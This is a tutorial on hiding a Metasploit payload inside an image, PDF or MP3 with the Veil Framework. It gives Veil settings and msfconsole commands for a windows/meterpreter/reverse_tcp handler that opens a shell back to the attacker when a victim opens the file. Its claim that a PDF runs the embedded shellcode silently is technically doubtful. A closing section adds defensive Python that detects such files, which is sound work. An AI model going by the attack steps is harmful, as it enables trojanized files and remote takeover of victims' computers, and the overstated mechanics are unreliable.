Combine the Payload with an Image, PDF, MP3

Combining a Metasploit payload with a benign file type like an image, PDF, or MP3 is a technique designed to bypass signature-based detection and exploit human curiosity. This method, often facilitated by steganography or file binders, involves hiding the malicious executable within the structure of a seemingly harmless file. To begin this process using the Veil Framework, launch the tool by typing veil in your Kali Linux terminal. Once the main menu is active, enter use 1 to access the Evasion module. From the payload selection screen, list the available options and choose a payload that supports file binding or steganography capabilities. Payloads utilizing languages like C or Python are generally better suited for this, specifically those designed to inject shellcode into other processes rather than acting as standalone executables.

After selecting your payload, configure the essential network settings by entering set LHOST with your IP address and set LPORT with your listener port. The crucial step for binding is to locate the setting labeled CUSTOM_EXE or similar, depending on the chosen module. Instead of a standard executable, you will provide the path to your benign file, such as a PDF document or a JPEG image; for example, set CUSTOM_EXE /home/kali/Documents/report.pdf. When you type generate, Veil will attempt to embed the malicious shellcode within the legitimate file’s structure.

While Veil prepares the file, open a new terminal and launch the Metasploit console by typing msfconsole. Enter use exploit/multi/handler and set the payload to match the one you configured in Veil, for instance, set PAYLOAD windows/meterpreter/reverse_tcp. Set the matching LHOST and LPORT, then type exploit. When the target opens the modified file, the benign file may open normally in a reader application while the hidden shellcode executes silently in the background, establishing a Meterpreter session.
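From the defender's side, a file that claims to be an image, PDF, or MP3 but carries executable content can be triaged by comparing its extension with its magic bytes, looking for an embedded PE header, and measuring any data after the format's end marker. The following is an added example, not part of the original page or of Veil or Metasploit; the function names and the sample byte strings are constructed for illustration.

```python
import struct

# Leading magic bytes for the carrier types the page names (common variants only).
MAGIC = {
    "jpg": (b"\xff\xd8\xff",), "jpeg": (b"\xff\xd8\xff",),
    "pdf": (b"%PDF-",),
    "mp3": (b"ID3", b"\xff\xfb", b"\xff\xf3", b"\xff\xf2"),
}
# Markers after which a well-formed file normally has no further content.
END_MARKER = {"jpg": b"\xff\xd9", "jpeg": b"\xff\xd9", "pdf": b"%%EOF"}


def find_pe_offsets(data: bytes) -> list[int]:
    """Offsets of 'MZ' headers whose e_lfanew field points at a 'PE\\0\\0' signature."""
    hits, pos = [], data.find(b"MZ")
    while pos != -1:
        if pos + 0x40 <= len(data):
            (e_lfanew,) = struct.unpack_from("<I", data, pos + 0x3C)
            if data[pos + e_lfanew: pos + e_lfanew + 4] == b"PE\x00\x00":
                hits.append(pos)
        pos = data.find(b"MZ", pos + 1)
    return hits


def inspect(filename: str, data: bytes) -> list[str]:
    """Return triage findings for a file whose name claims a benign type."""
    ext = filename.rsplit(".", 1)[-1].lower()
    findings = []
    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        findings.append("magic-mismatch")
    findings += [f"embedded-pe@{off}" for off in find_pe_offsets(data)]
    marker = END_MARKER.get(ext)
    idx = data.rfind(marker) if marker else -1
    if idx != -1:
        tail = data[idx + len(marker):].strip()
        if tail:
            findings.append(f"trailing-data:{len(tail)}")
    return findings


# Constructed samples: a minimal JPEG skeleton and an inert PE header skeleton
# (headers only, no code), used purely to exercise the checks offline.
CLEAN_JPEG = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"\xff\xd9"
PE_STUB = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0x40) + b"PE\x00\x00" + b"\x00" * 20

if __name__ == "__main__":
    for name, blob in [("photo.jpg", CLEAN_JPEG), ("photo.jpg", CLEAN_JPEG + PE_STUB),
                       ("report.pdf", PE_STUB)]:
        print(name, inspect(name, blob) or "clean")
```

These checks are heuristics: encoded or encrypted shellcode has no PE header, so the magic and trailing-data findings matter most there, and some legitimate JPEGs carry appended metadata that will also report trailing data.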
